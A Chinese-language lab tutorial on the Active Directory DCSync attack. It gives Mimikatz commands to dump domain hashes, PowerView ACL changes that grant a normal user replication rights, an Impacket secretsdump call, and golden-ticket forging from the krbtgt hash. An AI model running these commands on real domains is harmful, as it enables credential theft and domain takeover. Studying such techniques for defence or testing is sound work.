DCSync

DCSync概述

DCSync是一種用于獲取用戶(hù)憑據(jù)的方法，可以用來(lái)查找DC，請(qǐng)求目錄復(fù)制，并從后續(xù)響應(yīng)中收集密碼哈希。在2015年成為Mimikatz工具的一個(gè)板塊，可以在一定條件下導(dǎo)出域內(nèi)哈希。

實(shí)驗(yàn)環(huán)境

域名：HIRO
域控：WIN-KONG@192.168.228.10 域管：hiro\administrator
主機(jī)：WINis07@192.168.228.15 域用戶(hù):hiro\win7

利用條件：

1.域控本地管理組用戶(hù)（administrators，Domain Admins，Enterprise Admins的組內(nèi)用戶(hù)）

2.域控制器的計(jì)算機(jī)用戶(hù)(可能域控有CVE-2020-1472漏洞[ZeroLogon])
3.拿下exchange服務(wù)器后可以WriteACL賦予指定用戶(hù)或域機(jī)器DCSync權(quán)限

利用方式：

1.擁有上述條件的任意用戶(hù)權(quán)限，即可導(dǎo)出域內(nèi)任意用戶(hù)的hash

導(dǎo)出administrator用戶(hù)的Hash
privilege::debug
lsadump::dcsync /domain:hiro.com /user:administrator

導(dǎo)出所有用戶(hù)的哈希
privilege::debug
lsadump::dcsync /domain:hiro.com /all /csv

2.使用Empire下的powerview.ps1腳本執(zhí)行以上三條ACE

DCsync是幾個(gè)權(quán)限的集合體，如果使其具有DCSync權(quán)限的話(huà)，可以向域內(nèi)普通用戶(hù)添加如下三條ACE(Access Control Entries)：
DS-Replication-Get-Changes-->(GUID:1131f6aa-9c07-11d1-f79f-00c04fc2dcd2)
DS-Replication-Get-Changes-All-->(GUID:1131f6ad-9c07-11d1-f79f-00c04fc2dcd2)
DS-Replication-Get-Changes-->(GUID:89e95b76-444d-4c62-991a-0facbeda640c)

在域管用戶(hù)上給域用戶(hù)win7添加以上三條ACE
Add-DomainObjectAcl -TargetIdentity "DC=hiro,DC=com" -PrincipalIdentity win7 -Rights DCSync -Verbose

當(dāng)用戶(hù)win7具有DCSync權(quán)限后，可以導(dǎo)出域內(nèi)哈希：
python3 secretsdump.py hiro.com/win7:123456QWE.@192.168.228.10 -dc-ip 192.168.228.10

給域用戶(hù)win7刪除以上三條ACE
Remove-DomainObjectAcl -TargetIdentity "DC=hiro,DC=com" -PrincipalIdentity win7 -Rights DCSync -Verbose

域用戶(hù)win7失去了DCSync權(quán)限，同時(shí)也無(wú)法導(dǎo)出域內(nèi)hash了

3.使用黃金票據(jù)+DCSync導(dǎo)出域內(nèi)所有用戶(hù)的Hash：

生成黃金票據(jù)：
privilege::debug
得到krbtgt用戶(hù)hash
lsadump::dcsync /domain:hiro.com /user:krbtgt
導(dǎo)入黃金票據(jù)，其中sid為域的sid
kerberos::golden /user:administrator /domain:hiro.com /sid:S-1-5-21-1909134247-741334235-3019370817 /krbtgt:5f468f6d7ac43c327396d832a0241d81 /ptt